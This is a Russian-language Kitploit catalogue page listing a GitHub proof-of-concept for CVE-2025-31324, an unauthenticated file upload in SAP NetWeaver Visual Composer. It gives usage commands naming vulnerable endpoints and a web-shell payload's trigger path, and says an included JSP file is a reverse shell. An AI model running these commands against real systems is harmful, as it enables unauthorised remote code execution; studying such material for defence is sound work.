Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-31324_PoC — Концептуальное доказательство для CVE-2025-31324: Неаутентифицированная загрузка в SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
Инструменты/GitHubGitHub/odst-forge/cve-2025-31324_poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubodst-forge/cve-2025-31324_poc

CVE-2025-31324_PoC

Концептуальное доказательство для CVE-2025-31324: Неаутентифицированная загрузка в SAP NetWeaver Visual Composer Metadata Uploader

Репозиторий
621 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-31324_PoC

Доказательство концепции для CVE-2025-31324: неаутентифицированная загрузка в SAP NetWeaver Visual Composer Metadata Uploader

Этот скрипт выполняет:

  1. Загрузка файла на уязвимую конечную точку (через хост/порт Upload)
  2. Опциональный запуск через HTTP GET (через хост/порт Trigger)
  3. Базовая проверка ответа/логирование

Пример использования: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

У вас также есть возможность загрузить .war файл, если вы хотите выполнить его таким образом. cache.jsp — это reverse shell, который предоставит вам доступ после попадания в систему. (Всё ещё прорабатываются проблемы)

Отказ от ответственности

Это предназначено только для образовательных целей и не должно использоваться для вредоносных действий. Всегда убедитесь, что у вас есть необходимые разрешения, и следуйте этическим нормам при тестировании или исследовании уязвимостей безопасности.

Если у вас есть вопросы или требуется разъяснение, пожалуйста, обращайтесь. Будьте в безопасности!

Скачать инструмент